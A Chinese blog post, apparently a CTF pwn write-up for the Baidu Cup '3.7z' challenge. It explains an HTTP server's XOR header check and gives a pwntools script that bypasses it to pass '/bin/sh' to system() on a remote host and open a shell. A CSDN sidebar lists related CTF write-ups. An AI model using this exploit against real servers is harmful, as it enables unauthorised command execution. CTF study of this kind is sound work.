"百度杯" 十一月场 3.7z

最新推荐文章于 2020-03-22 02:17:42 发布
最新推荐文章于 2020-03-22 02:17:42 发布
阅读量357 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baiyeguang/article/details/88323248
版权

题目链接:https://pan.baidu.com/s/1qB1JD8dlkOamCJJU2wRc-g 密码:7jn3

程序分析

有两个文件夹step1和step2,两个程序相同,但是step1是静态编译。step2是动态链接,所以step2的更易于分析
IDA载入
在这里插入图片描述这是一个简易的http服务器,往下跟进
在这里插入图片描述这里我们可以看到如果,满足if判断并且使system的参数为‘/bin/sh,就可以实现getshell
绕过if检测的关键在于
在这里插入图片描述在这里插入图片描述简单的异或,这里s==‘useragent’

漏洞利用

1.通过异或函数构造好想要的报文来绕过if检测
2.绕过之后上传‘/bin/sh’

EXP

from pwn import*

#p=process('./http')
p=remote('106.75.2.53', 80)

def check(data):
    payload=''
    for i in range(len(data)):
        payload+=chr(i^ord(data[i]))
    return payload

payload='User-Agent: '+check('useragent')
payload+='token: '+'/bin/sh'
payload+='\r\n\r\n'   #http协议

p.sendline(payload)

p.interactive()

学习链接:
http://tacxingxing.com/2017/12/27/icqbai-du-bei11yuepwn/#toc_1
https://www.ichunqiu.com/course/56467

F1Sh.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
i春秋 “百度”CTF比赛 十月 Backdoor
include_heqile的博客
09-20 2885
https://www.ichunqiu.com/battalion?t=1&r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
百度”CTF比赛 十一月 3.7z
SPS98
11-07 487
这题做的是真懵逼, 一是不会做, 二是题目的代码复杂的一批=-=
百度”CTF比赛 十一月小常识
SPS98
11-03 464
最开始没看懂题意, 翻了三份wp也没搞懂, 用工具把94换成十进制, 结果工具给我了三个三位十进制, 弄得懵逼, 后面换成在线工具才得到148 4664也是一样的情况, 用在线工具才得到18020 然后提交flag{0000148,18020}并不行, 看到别人wp里说的flag{xxx,xxxxx}, 就把前面的0去掉, 于是提交成功… ...
日志 7.3 pwn
RobinZZX的博客
07-04 191
ALT+T 在ida中查找字符串 如果参数是程序中没有的字符串,需要写入的时候,可以将字符串先传到寄存器1中,将写入的地址(一般是bss或者data段)存入寄存器2中,然后用mov指令将寄存器1写入寄存器2,来实现字符串的写入。 mov qword ptr [r14], r15 ; ret 将r15的内容转移到r14所指的地址上 八个比特(Bit)称为一个字节(Byte),两个字节称为一个字(Wo...
百度”CTF比赛 十月Backdoor(git泄露)
weixin_43610673的博客
03-22 747
访问/Challenges/.git 发现返回403 上GitHack 查看fiag.php源码 按经验flag就在这,猜测要版本回滚,访问/Challenges/.git/logs/HEAD 使用Git_Extract会自动解析提取这些commit 访问b4ckdo0r.php 尝试.b4ckdo0r.php.swo和.b4ckdo0r.php.swp 丢到kali中 用vim打...
钢琴88键按键声音MP3.7z
04-15
《钢琴88键按键声音MP3.7z》是一个压缩包文件,包含了88个钢琴键的音色素材,格式为MP3。这样的资源对于音乐制作人、教师、学习者或者对钢琴声音感兴趣的爱好者来说非常有价值。MP3是一种广泛使用的音频压缩格式,...
Typora 1.2.3.7z
最新发布
06-24
windows版 本地打开操作md文档软件
IDM.6.42.3.7z
05-16
IDM.6.42.3.7z
python3.7z
01-21
在本压缩包“python3.7z”中,我们可以推测包含的是与Python3相关的资源,特别是针对云通讯景的应用。容联云通讯是一家提供全方位通信服务的平台,包括但不限于语音、视频、消息等多种通讯方式。他们提供的API和...
sqlite3.7z
02-01
sqlite3.exe Ver 3.33版本 2020-8-14出版,还是蛮新的版本。 E:\sqlite3>sqlite3 --version #显示sqlite3的版本 3.33.0 2020-08-14 13:23:32 fca8dc8b578f215a969cd899336378966156154710873e68b3d9ac5881b0alt2 ...
百度”CTF比赛(十一月)
Root__Liu的博客
11-27 6884
第一  1、小可爱 解: 2、签到题 解:加群下载文件“flag.rar”,打开时需要解密,输入给的key解出来 直接提交就可以了,这道题很喜欢。。。。 3、所以这是13点吗 解:第一眼看过去这是凯撒密码,直接拿去凯撒暴力破解
百度”CTF比赛 十一月--CrackMe01
Hk_Mayfly的博客
10-19 551
测试文件:https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/BSRC-11-3/CrackMe01_97D2BF0DBD2EC13065E7104F24CAAED9.zip 1.准备 获取信息 32位文件 2.IDA打开 熟悉Windows API的话,一般组成的就是Messag...
百度”CTF比赛 2017 二月 没错!就是文件包含漏洞。
weixin_30586085的博客
03-27 286
题目源码: 文件包含漏洞的话,看一下 你么可以使用php://input 伪协议,执行代码(参考了大佬WP)这里使用了POSTMAN, 目录下还有一个dle345aae.php文件,呢么用cat命令打开,并且输出文件内容(反单引号在linux中表示命令) 还有一种方法是用php://filter(php伪协议,作为中间流可以读取)直接读取dle3456aae.php...
i春秋 “百度”CTF比赛 十月 web题 Backdoor
weixin_30375247的博客
10-21 674
0x00: 打开题目,题目中告诉我们这题是文件泄露。 0x01: 通过扫描目录,发现可以扫到的有3个文件 index.php flag.php robots.txt 但是浏览flag.php它告诉我们这不是真正的flag 又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。 我们浏览这个url http://6...
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
BackDoor
a1b2c3是弱口令
08-08 1643
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&amp;lt;'5.3.0'...
百度十一月 pwnme
baiyeguang的博客
03-14 1413
题目链接 程序分析 查看程序保护机制 开启了NX,无法修改GOT表 IDA载入分析 发现三个漏洞: 格式化字符串 这个在show功能里,参数分别是username和password 整型溢出 这里可以看到password可以输入0x12C,在下面if判断时对长度加以判断,不能超过20,但是存在类型转换截断,由于Byte是8位,当转换时超过Byte表示范围则从低位截取8位,所以这里我们输入0x...
百度”CTF比赛 九月Upload ---------i春秋
weixin_30763397的博客
07-07 281
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤了,试一下用其他方式 得到flag 转载于:https:...
百度百度”CTF比赛 十一月 Reverse CrackMe01 Writeup
wangtiankuo的博客
07-25 2819
题目链接:https://www.ichunqiu.com/battalion 取文本框中内容的函数是GetWindowTextW,给GetWindowTextW下断点,运行,5次F9之后,才可以在文本框中输入字符,随便输入123456789,鼠标放在click上后就从running状态变成了Paused,继续运行,会将输入拷贝到另一个地方,然后调用PostMessage函数。 用IDA动...
python3.7爬取百度文库
07-18
Python3.7可以使用各种库和工具来进行网络爬虫,其中包括爬取百度文库。下面我将介绍我认为是最简单的方法来实现这个任务。 首先,你需要安装BeautifulSoup和requests库。你可以使用以下命令来安装它们: ``` pip ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值